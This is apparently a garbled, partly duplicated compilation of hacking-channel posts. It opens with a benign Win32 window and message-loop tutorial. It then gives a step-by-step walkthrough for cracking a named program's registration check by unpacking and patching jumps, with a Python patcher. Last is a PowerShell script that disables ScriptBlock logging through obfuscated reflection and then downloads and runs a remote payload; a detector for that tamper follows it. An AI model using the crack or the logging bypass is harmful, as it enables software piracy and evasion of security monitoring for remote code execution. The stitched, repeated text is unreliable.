    hWnd = CreateWindow(m_szName, m_szName, WS_OVERLAPPEDWINDOW, 100, 100, 320, 240, NULL, NULL, hInstance, NULL); // create the window
    ShowWindow(hWnd, nCmdShow); // show the window

    MSG sMsg;
    int ret;
    // message loop: GetMessage returns 0 on WM_QUIT and -1 on error
    while ((ret = GetMessage(&sMsg, NULL, 0, 0)) != 0)
    {
        if (ret == -1)
            break; // invalid window handle or similar error: stop instead of spinning forever
        TranslateMessage(&sMsg);
        DispatchMessage(&sMsg);
    }
    return 0;
}
3) Although this program only displays a window, it is often used to explain the basic structure of Windows programs, and a similar structure can be found inside the MFC framework. The program contains the following basic concepts:
the window class, the window procedure and the window message loop,
which are introduced below.
4) Window classes, windows and window procedures
When creating a window, you provide the name of a window class. A window class is equivalent to a window template: we can create multiple windows from the same window class. We can use the window classes that Windows registers in advance, but more often we want to register our own. When registering a window class we supply items such as the name, style, icon, cursor and menu; the most important of these is the address of the window procedure.
5) The window procedure is a function.
π¦ Window, thread, superclass, subclass Full by Undercode
t.me/undercodeTesting
π¦ ππΌππ πππΈβπ :
1) Windows and messages for Windows are discussed for completeness of the narrative, and processes and threads are briefly discussed. Subclassing and Superclassing are two methods of reusing code that accompany the Windows window mechanism. Don't confuse "subclassing, superclassing" with derived and base classes in object-oriented languages. The "class" in "subclassing and superclassing" refers to the window class of Windows.
2) The system establishes a message queue for a windowed thread. A thread with a message queue can receive messages. For example, we can use the PostThreadMessage function to send messages to threads.
As long as a windowless thread calls PeekMessage or GetMessage, the system will also create a message queue for it.
🦑 Windows and messages
1) The thread's message queue
Every running program is a process, and every process has one or more threads. Some threads own no window; others own one or several.
Messages can be sent to a thread, but most are sent to a window. A message sent to a window still lands in the message queue of the thread that owns the window: think of the queue as the mailbox and the window as the addressee. When we send a message to a given window, the system finds the thread the window belongs to and places the message in that thread's queue.
The thread message queue is an internal data structure of the system; a program never sees it directly. Through the Windows API we can send and post messages to the queue, retrieve messages from it, and translate and dispatch what we retrieved.
2) The smallest Windows program
Most Windows programmers have seen a minimal program like this one:
// Example 1
#include <windows.h>
#include <string.h>

static const char m_szName[] = "window";

// If the window procedure simply forwarded everything to DefWindowProc, the
// message loop would never end when the window is closed: DefWindowProc
// destroys the window but does not post WM_QUIT.
static LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    switch (uMsg)
    {
    case WM_DESTROY:
        PostQuitMessage(0); // post WM_QUIT so that GetMessage returns 0 and the loop ends
        break;
    default:
        return DefWindowProc(hWnd, uMsg, wParam, lParam);
    }
    return 0;
}

// Entry point of a GUI program
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    WNDCLASS wc;
    memset(&wc, 0, sizeof(WNDCLASS));
    wc.style = CS_VREDRAW | CS_HREDRAW;
    wc.lpfnWndProc = WindowProc;                   // the window procedure: the most important field
    wc.hInstance = hInstance;                      // module that owns the class
    wc.hCursor = LoadCursor(NULL, IDC_ARROW);
    wc.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1); // hbrBackground takes a system colour index + 1
    wc.lpszClassName = m_szName;
    if (!RegisterClass(&wc))                       // register the window class
        return 1;

    HWND hWnd = CreateWindow(m_szName, m_szName, WS_OVERLAPPEDWINDOW,
                             100, 100, 320, 240, NULL, NULL, hInstance, NULL); // create a window of that class
    if (!hWnd)
        return 1;
    ShowWindow(hWnd, nCmdShow);                    // show the window

    MSG sMsg;
    int ret;
    while ((ret = GetMessage(&sMsg, NULL, 0, 0)) != 0)
    {
        // message loop: GetMessage returns 0 for WM_QUIT and -1 on error
        if (ret != -1)
        {
            TranslateMessage(&sMsg);
            DispatchMessage(&sMsg);
        }
    }
    return 0;
}
3) Although this program only displays a window, it is often used to explain the basic structure of a Windows program, and the same structure can be found inside the MFC framework. It contains three basic concepts: a window class, a window procedure and a message loop. They are introduced below.
4) Window classes, windows and window procedures
When creating a window, we give the name of a window class. A window class is a template for windows: several windows can be created from the same class. We can use the window classes that Windows registers in advance (the standard controls), but more often we register our own. Registering a window class means supplying its name, style, icon, cursor, menu and so on; the most important item is the address of the window procedure.
5) The window procedure is a function. Every message the window receives is passed to this function for processing. So how does a message that was placed in the thread's queue reach the window?
6) The message loop
Programmers who know embedded multitasking systems will recognise the basic shape of a task (the equivalent of a Windows thread):
while (1) { wait for a signal; process the signal; }
The task wakes up when a signal arrives, handles it, and otherwise sleeps so that other tasks can run. This is the basic structure of a message-driven program, and a Windows program does the same:
while ((ret = GetMessage(&sMsg, NULL, 0, 0)) != 0)
{
    // message loop
    if (ret != -1)
    {
        TranslateMessage(&sMsg);
        DispatchMessage(&sMsg);
    }
}
GetMessage takes one message from the queue and blocks until one is available. TranslateMessage turns WM_KEYDOWN/WM_KEYUP pairs into WM_CHAR messages and posts them back to the queue. DispatchMessage delivers the message to the window named by the handle in the MSG structure, that is, it calls that window's window procedure.
7) Communicating by message
The function that creates a window returns a window handle. A window handle identifies one window instance across the whole desktop, not just within a process, so by sending messages to a window we get both in-process and inter-process communication. A handle is not a capability, though: any process on the same desktop that can find the window (with FindWindow, for instance) can send it messages, and the window procedure cannot tell who sent one, so it must validate every parameter of every message it handles. Since Windows Vista, User Interface Privilege Isolation (UIPI) blocks messages from a lower-integrity process to a higher-integrity window unless the receiver opts in with ChangeWindowMessageFilterEx.
We can use SendMessage or PostMessage to send or post a message to a window. SendMessage does not return until the target window has processed the message. I tried: if SendMessage is sent to a window without a message loop, the SendMessage function never returns. PostMessage returns immediately after placing the message in the thread's queue.
Only posted messages go through DispatchMessage. A message sent with SendMessage from another thread is handed to the window procedure while the receiving thread is inside GetMessage (or another call that pumps messages) and never passes through DispatchMessage; a SendMessage from the window's own thread simply calls the window procedure directly.
🦑 Example of communication between a window program and a console program
Do you think Example 1 is useless? Let's use it for a small game: let Example 1 talk to a console program. First we change the window procedure of Example 1 to:
static LRESULT CALLBACK WindowProc(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
    static DWORD tid = 0;   // thread id of the console program, once it has introduced itself
    switch (uMsg)
    {
    case WM_DESTROY:
        PostQuitMessage(0); // post WM_QUIT so the message loop ends when the window is closed
        break;
    case WM_USER:
        // The console program sends its thread id in wParam. Note that any process able to
        // find this window can send WM_USER with any value it likes; nothing authenticates it.
        tid = (DWORD)wParam;
        SetWindowText(hWnd, "Received");
        break;
    case WM_CHAR:
        if (tid)
        {
            switch (wParam)
            {
            case '1': PostThreadMessage(tid, WM_USER + 1, 0, 0); // message 1 to the console program
                break;
            case '2': PostThreadMessage(tid, WM_USER + 2, 0, 0); // message 2 to the console program
                break;
            }
        }
        break;
    default:
        return DefWindowProc(hWnd, uMsg, wParam, lParam);
    }
    return 0;
}
Then we create a console program with the following code:
#include <windows.h>
#include <stdio.h>

static HWND m_hWnd = 0;

// Handle a message posted to this thread by the window program
void process_msg(UINT msg, WPARAM wp, LPARAM lp)
{
    char buf[100];
    static int i = 1;
    if (!m_hWnd)
        return;
    switch (msg)
    {
    case WM_USER + 1:
        // ask the other process for its window title; the system copies it into our buffer
        SendMessage(m_hWnd, WM_GETTEXT, sizeof(buf), (LPARAM)buf);
        printf("You are now called: %s\n\n", buf);
        break;
    case WM_USER + 2:
        // rename the other process's window; wParam of WM_SETTEXT is unused and must be 0
        sprintf(buf, "I am window %d", i++);
        SendMessage(m_hWnd, WM_SETTEXT, 0, (LPARAM)buf);
        printf("Renamed you\n\n");
        break;
    }
}

int main()
{
    MSG sMsg;
    printf("Started with thread id %lu\n", GetCurrentThreadId());
    // A console thread has no message queue until it calls a message function. Force one
    // into existence before handing out our thread id, otherwise an early PostThreadMessage
    // from the window program would fail.
    PeekMessage(&sMsg, NULL, WM_USER, WM_USER, PM_NOREMOVE);
    m_hWnd = FindWindow(NULL, "window");   // look the window up by its title
    if (m_hWnd)
    {
        printf("Found window %p\n\n", (void *)m_hWnd);
        SendMessage(m_hWnd, WM_USER, GetCurrentThreadId(), 0); // tell it our thread id
    }
    else
    {
        printf("No window found\n\n");
    }
    int ret;
    while ((ret = GetMessage(&sMsg, NULL, 0, 0)) != 0)
    {
        // message loop of a windowless thread: no Translate/Dispatch, thread messages are
        // handled directly; nothing posts WM_QUIT here, so the loop runs until the process is killed
        if (ret != -1)
        {
            process_msg(sMsg.message, sMsg.wParam, sMsg.lParam);
        }
    }
    return 0;
}
7) Can everyone see how to play this game? Run Example 1 (wnd) first, then run the console program (msg). msg finds wnd's window and sends it its main thread id; wnd confirms receipt by changing its title to "Received". At this point the two have a channel in each direction: wnd can post messages to msg's main thread, and msg can send messages to wnd's window.
8) Press '1' in the wnd window and wnd posts message 1 to msg; on receiving it, msg reads wnd's window title with WM_GETTEXT and prints it. Press '2' and wnd posts message 2 to msg; on receiving it, msg changes wnd's window title with WM_SETTEXT.
9) This small example shows the message loop of a console program, posting messages to a thread, and exchanging messages between processes.
10) The address-space problem
Different processes have separate address spaces. If process A puts one of its own addresses into the parameters of a message and sends it to process B, and process B dereferences that address in its own address space, the result is wrong at best. So why do WM_GETTEXT and WM_SETTEXT work in the example above?
Because WM_GETTEXT and WM_SETTEXT are messages defined by Windows itself. Windows knows what their parameters mean and handles them specially: it allocates a buffer in process B's address space as a relay and copies the data between process A's buffer and process B's buffer at the right moments. If you set a breakpoint in the example above (Section 1.5.1 of the original article) you will see that the lParam in the WM_SETTEXT sent by msg is not equal to the lParam that wnd receives.
11) If we pass a memory address in a message we defined ourselves, the system does nothing special with it, so it is bound to fail. Windows provides WM_COPYDATA for passing a block of data to a window, and treats that message specially too. The receiver must treat the buffer as read-only, copy out what it needs before its window procedure returns, and validate the cbData length and the contents before using them, because the sender can be any process that found the window handle.
12) When a message that needs this extra memory handling crosses process boundaries, it must be sent with SendMessage, not PostMessage: SendMessage waits until the receiver has finished processing, which gives the system the chance to release the relay buffer. PostMessage refuses such messages (it returns FALSE, and GetLastError reports ERROR_MESSAGE_SYNC_ONLY). Readers can try this in the msg program.
🦑 Subclassing and superclassing
A window class is a template for a window, and a window is an instance of a window class. Window class and
temporarily)
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 How to crack a software registration code, full by UnderCode:
twitter.com/undercodeNews
🦑 LET'S START:
This is written for readers who have never been exposed to software cracking or programming.
> Let's start today's crack.
> The target: "Network Form Terminator" (FormGhost.exe). The tools needed:
1) packer detector: language.exe
2) unpacker: AspackDie.exe
3) disassembler: W32Dasm Gold edition
4) hex editor: UltraEdit.rar
🦑 Review the basics before cracking:
I. Levels of cracking
> Beginner: modify the program, i.e. patch the exe with UltraEdit. This is called brute-force cracking, "blasting" for short.
> Intermediate: trace the program to recover the registration code.
> Advanced: write a key generator (registration machine).
🦑 General steps for cracking with W32Dasm:
1) Read the software's manual: what is the difference between the registered and unregistered versions, and how is it registered?
2) Run the software and try to register with your name and an arbitrary registration code. Note the error message it shows and write it down.
3) Check whether the exe is packed.
4) Disassemble it with W32Dasm Gold.
5) Find the error message (or the success message) among the string references and jump to the code that uses it.
6) In the W32Dasm main window, analyse the assembly around it to identify the key call and the key jump.
7) Put the cursor on the key jump (the line turns green); the bottom of the W32Dasm main window shows its file offset, which is the address you actually modify.
8) In UltraEdit, go to that offset, change the machine code and save.
🦑 The concept of a packer ("shell"): an author who wants to protect copyright information and keep others from changing the program compresses or encrypts the exe with a packer. The most common packers are ASPack, UPX and PECompact.
> Unpacking: first detect which packer was used, then unpack the file to restore its original form. If it is not packed, no unpacking is needed. Unpackers: unaspack, caspr, upx, unpecompact, procdump.
> File offset (the address you actually modify) versus line address (virtual address). W32Dasm's disassembly has three columns:
the first column is the line address (virtual address);
the second column is the machine code (what you finally change in UltraEdit);
the third column is the assembly instruction.
1) First column (virtual address)   Second column (machine code)   Third column (instruction)
:0041BE38   2B45F0         sub eax, dword ptr [ebp-10]
:0041BE3B   6A42           push 00000042
:0041BE3D   50             push eax
:0041BE3E   FF75F4         push [ebp-0C]
:0041BE41   FF75F0         push [ebp-10]
:0041BE44   FF35A8AB4400   push dword ptr [0044ABA8]
2) Two situations, two different patches:
a) Change it to jmp: je (jne, jz, jnz) => jmp, machine code EB. Use this when, searching upward from the error message, the first conditional jump you find is the one that leads into the error path. jmp is an absolute, unconditional jump, so the error message below it is always skipped.
b) Change it to nop: je (jne, jz, jnz) => nop, machine code 90. Use this when, searching upward from the success message, the first conditional jump you find is the one that jumps past it. nop erases the jump so that it no longer does anything, and the program falls straight through into the success path that follows.
Mind the instruction length: a short conditional jump (74 xx, 75 xx) is 2 bytes, so EB xx replaces it exactly but nop-ing it needs two 90 bytes; a near conditional jump (0F 84 or 0F 85 followed by a 4-byte displacement) is 6 bytes, and a jmp written over it (E9 plus a 4-byte displacement) is only 5, so the leftover byte must become a nop and the displacement has to be adjusted by one.
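To make the relationship between the line address and the file offset, and the two patches, concrete, here is a small Python script added as an example; it is not part of UnderCode's tutorial nor of any of the tools named above. It parses the PE section table to turn a W32Dasm line address into a file offset and patches the conditional jump found there either to jmp or to nop, handling both the 2-byte short and the 6-byte near forms. The PE image it works on is constructed inline, and the function names and the addresses 0x401002 and 0x401004 are this example's own.

```python
"""
Map a W32Dasm line address (virtual address) to the file offset a hex editor
needs, then apply the two patches described in the text:
  conditional jump -> jmp  (always skip the error path)
  conditional jump -> nop  (erase the jump, fall through into the success path)
The PE below is constructed for this example; the parser works on any PE32/PE32+.
"""
import struct


def _sections(pe):
    """Parse the PE headers. Returns (ImageBase, [(VirtualAddress, VirtualSize, PointerToRawData, SizeOfRawData), ...])."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    nsect = struct.unpack_from("<H", pe, coff + 2)[0]
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                                   # PE32: 32-bit ImageBase at +28
        image_base = struct.unpack_from("<I", pe, opt + 28)[0]
    elif magic == 0x20B:                                 # PE32+: 64-bit ImageBase at +24
        image_base = struct.unpack_from("<Q", pe, opt + 24)[0]
    else:
        raise ValueError("unknown optional header magic 0x%X" % magic)
    secs = []
    for i in range(nsect):
        hdr = opt + opt_size + 40 * i                    # section table follows the optional header
        vsize, va, raw_size, raw_off = struct.unpack_from("<IIII", pe, hdr + 8)
        secs.append((va, vsize, raw_off, raw_size))
    return image_base, secs


def va_to_offset(pe, va):
    """Virtual address (W32Dasm's first column) -> file offset (what you change in UltraEdit)."""
    image_base, secs = _sections(pe)
    rva = va - image_base
    for sec_va, vsize, raw_off, raw_size in secs:
        if sec_va <= rva < sec_va + max(vsize, raw_size):
            delta = rva - sec_va
            if delta >= raw_size:
                raise ValueError("VA 0x%X has no bytes on disk (uninitialised data)" % va)
            return raw_off + delta
    raise ValueError("VA 0x%X is not inside any section" % va)


SHORT_JCC = range(0x70, 0x80)   # 74 je, 75 jne, ...: opcode + rel8, 2 bytes
NEAR_JCC = range(0x80, 0x90)    # 0F 84 je, 0F 85 jne, ...: 0F xx + rel32, 6 bytes


def patch_jump(pe, va, mode):
    """Patch the conditional jump at va. mode: "jmp" (make unconditional) or "nop" (erase).
    Returns (patched_image, file_offset, old_bytes, new_bytes)."""
    if mode not in ("jmp", "nop"):
        raise ValueError("mode must be 'jmp' or 'nop'")
    off = va_to_offset(pe, va)
    buf = bytearray(pe)
    op = buf[off]
    if op in SHORT_JCC:
        old = bytes(buf[off:off + 2])
        # jmp short (EB rel8) has the same length, so the displacement is unchanged;
        # nop-ing must overwrite both bytes or the old rel8 becomes a stray opcode.
        new = bytes([0xEB, old[1]]) if mode == "jmp" else b"\x90\x90"
    elif op == 0x0F and buf[off + 1] in NEAR_JCC:
        old = bytes(buf[off:off + 6])
        if mode == "jmp":
            # jmp near (E9 rel32) is 5 bytes, jcc near is 6. rel32 counts from the end of
            # the instruction, so it must grow by one; the spare byte becomes a nop.
            rel = struct.unpack("<i", old[2:6])[0]
            new = b"\xE9" + struct.pack("<i", rel + 1) + b"\x90"
        else:
            new = b"\x90" * 6
    else:
        raise ValueError("0x%X: byte %02X is not a conditional jump (wrong offset, or already patched?)" % (va, op))
    buf[off:off + len(new)] = new
    return bytes(buf), off, old, new


def build_sample_pe():
    """A minimal PE32 constructed for this example (not a real program):
    ImageBase 0x400000, one .text section at RVA 0x1000 / file offset 0x200."""
    code = bytes.fromhex(
        "3BC1"            # 0x401000  cmp eax, ecx
        "7406"            # 0x401002  je  0x40100A        (short jcc: the "key jump")
        "0F8505000000"    # 0x401004  jne 0x40100F        (near jcc)
        "B801000000"      # 0x40100A  mov eax, 1
        "C3"              # 0x40100F  ret
    )
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                          # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x0102)  # i386, 1 section, PE32 optional header
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                            # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)                          # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)                        # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                  # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, 0x200)                  # SizeOfImage, SizeOfHeaders
    sect = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    headers = (bytes(dos) + b"PE\0\0" + coff + bytes(opt) + sect).ljust(0x200, b"\0")
    return headers + code.ljust(0x200, b"\0")


if __name__ == "__main__":
    image = build_sample_pe()
    for va, mode in ((0x401002, "jmp"), (0x401004, "nop"), (0x401004, "jmp")):
        _, off, old, new = patch_jump(image, va, mode)
        print("VA %08X -> offset %06X: %s -> %s (%s)" % (va, off, old.hex().upper(), new.hex().upper(), mode))
```

Feed va_to_offset the address W32Dasm shows in its first column and it returns what the status bar calls the @Offset, i.e. the Ctrl+G target in UltraEdit; patch_jump refuses to touch a byte that is not a conditional jump, which catches the two classic mistakes of a wrong offset and of patching the same location twice.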
🦑 Alright, let's begin the cracking journey...
1) Detect the packer: open language.exe, choose Open, select the target FormGhost.exe and click OK, as in Figure 1. language.exe reports that the packer is ASPack.
2) Unpack: double-click AspackDie.exe; in the dialog that appears select FormGhost.exe and open it.
3) AspackDie writes unpacked.exe into the same directory. This is the unpacked FormGhost.exe.
4) Disassemble: open W32Dasm Gold (the Chinese-localised version), choose Disassembler > Open, select unpacked.exe and wait for it to load.
5) Start patching: open the hex editor UltraEdit.
> Open unpacked.exe in UltraEdit and press Ctrl+G; in the dialog enter the offset 0xacb4b (the file offset from W32Dasm, without its leading zeros).
6) Close everything, run the patched file you saved (unpacked222.exe), click Help > Register, enter any name and registration code and click OK; it reports that registration is complete (Figure 21). Back in the program, the Register item in the Help menu is now greyed out.
🦑 The crack is complete.
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
🦑 PowerShell ScriptBlock log bypass by underCode:
twitter.com/undercodeNews
🦑 LET'S START:
1) Like most logging features, ScriptBlock logging is controlled by Group Policy settings. PowerShell consults them every time it compiles a new script block to decide whether the block has to be logged. In practice, however, PowerShell reads the policy once, caches the result in memory and serves every later query from that cache.
2) Because that cache is an ordinary dictionary held in a private static field, its values can be rewritten with reflection:
$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils').GetField('cachedGroupPolicySettings', 'NonPublic,Static')
$GroupPolicySettings = $GroupPolicySettingsField.GetValue($null)
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockLogging'] =
$GroupPolicySettings['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0
3) None of this needs administrator rights or touches the registry, so it leaves no registry change behind. There is one limitation, however.
4) The cached settings are only read when a script block is compiled, so the block that performs the tampering is itself still logged before its new values take effect. That trigger block should therefore be as obfuscated as possible and must carry no payload: its only job is to switch logging off. Note that PowerShell also logs, at Warning level, any script block containing strings from its built-in list of suspicious tokens (reflection names such as GetField are on it) even when ScriptBlock logging is disabled, which is why the names below are split with backticks and string concatenation.
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
}
$val = [System.Collections.Generic.Dictionary[string,System.Object]]::new()
$val.Add('EnableScriptB'+'lockLogging', 0)
$val.Add('EnableScriptB'+'lockInvocationLogging', 0)
$GroupPolicyCache['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val
}
iex (New-Object Net.WebClient).downloadstring("https://server/payload.ps1")
5) The script above runs the trigger block, which rewrites the cached settings and checks that the relevant entries exist, and then fetches and runs the payload without its script blocks being logged. Two consequences matter to defenders: the cache is per process, so only that PowerShell instance stops logging, and the trigger block itself is written to the Microsoft-Windows-PowerShell/Operational log as Event ID 4104, so detection should key on its contents.
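A detection pass over the script-block text of 4104 events, added here as an example and not part of UnderCode's post: it de-obfuscates the text the way the trigger block is obfuscated (strips backticks, re-joins 'a'+'b' string splits) before matching, and scores the indicators of the cache tampering. The event texts are constructed for the example; on a real host feed it the ScriptBlockText of records returned by Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; Id=4104}. The indicator weights and threshold are this example's own choices.

```python
"""
Hunt for the ScriptBlock-logging tamper in PowerShell 4104 ("Creating Scriptblock text")
events. The first block that flips the cache is still logged, so that is where it shows up.
Matching is done on a de-obfuscated copy of the text: backticks are stripped and
'a'+'b' string splits are re-joined, which undoes the tricks used by the trigger block.
"""
import re

# Indicator -> weight. Reflection into the private Utils cache is the decisive signal;
# the policy value names on their own also appear in legitimate admin scripts.
INDICATORS = {
    "cachedGroupPolicySettings": 3,
    "System.Management.Automation.Utils": 2,
    "NonPublic,Static": 1,
    "EnableScriptBlockLogging": 1,
    "EnableScriptBlockInvocationLogging": 1,
    "ScriptBlockLogging": 1,
}
THRESHOLD = 3

# 'abc' + 'def'  (or "abc" + "def") with no quotes inside either half
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def normalize(text):
    """Undo the two cheap obfuscations used by the bypass script, for matching only."""
    text = text.replace("`", "")           # "GetFie`ld" -> "GetField": escaping a plain letter is a no-op
    while True:                            # 'ScriptB'+'lockLogging' -> 'ScriptBlockLogging', until stable
        joined = _CONCAT.sub(lambda m: "'" + m.group(2) + m.group(4) + "'", text)
        if joined == text:
            return text
        text = joined


def scan_events(events):
    """events: iterable of (record_id, script_block_text) taken from 4104 events.
    Returns [(record_id, score, matched_indicators, was_obfuscated), ...] for flagged records."""
    hits = []
    for record_id, raw in events:
        text = normalize(raw)
        lowered = text.lower()                                   # PowerShell is case-insensitive
        found = [name for name in INDICATORS if name.lower() in lowered]
        score = sum(INDICATORS[name] for name in found)
        obfuscated = text != raw
        if obfuscated and found:
            score += 1          # splitting exactly these names with quotes or backticks is itself a signal
        if score >= THRESHOLD:
            hits.append((record_id, score, found, obfuscated))
    return hits


# Constructed ScriptBlockText values (not real log data): two benign blocks, the obfuscated
# trigger block from the text, and the plain version of the same tamper.
SAMPLE_4104 = [
    (101, "Get-ChildItem -Path C:\\Windows\\System32 | Where-Object Length -gt 1MB"),
    (102, "Get-ItemProperty 'HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging' "
          "| Select-Object EnableScriptBlockLogging"),
    (103, "$f = [ref].Assembly.GetType('System.Management.Automation.Utils').\"GetFie`ld\"('cachedGroupPolicySettings', 'N'+'onPublic,Static')\n"
          "$c = $f.GetValue($null); $c['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0"),
    (104, "$GroupPolicySettingsField = [ref].Assembly.GetType('System.Management.Automation.Utils')"
          ".GetField('cachedGroupPolicySettings', 'NonPublic,Static')"),
]

if __name__ == "__main__":
    for record_id, score, found, obfuscated in scan_events(SAMPLE_4104):
        print("record %d: score %d, obfuscated=%s, indicators=%s" % (record_id, score, obfuscated, ", ".join(found)))
```

Record 102, an administrator reading the policy key, stays below the threshold because it never reaches into System.Management.Automation.Utils; records 103 and 104 are flagged whether or not the names are split, and the obfuscated flag on 103 is worth surfacing on its own, since there is no honest reason to write GetField with a backtick in it.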
WRITTEN BY UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β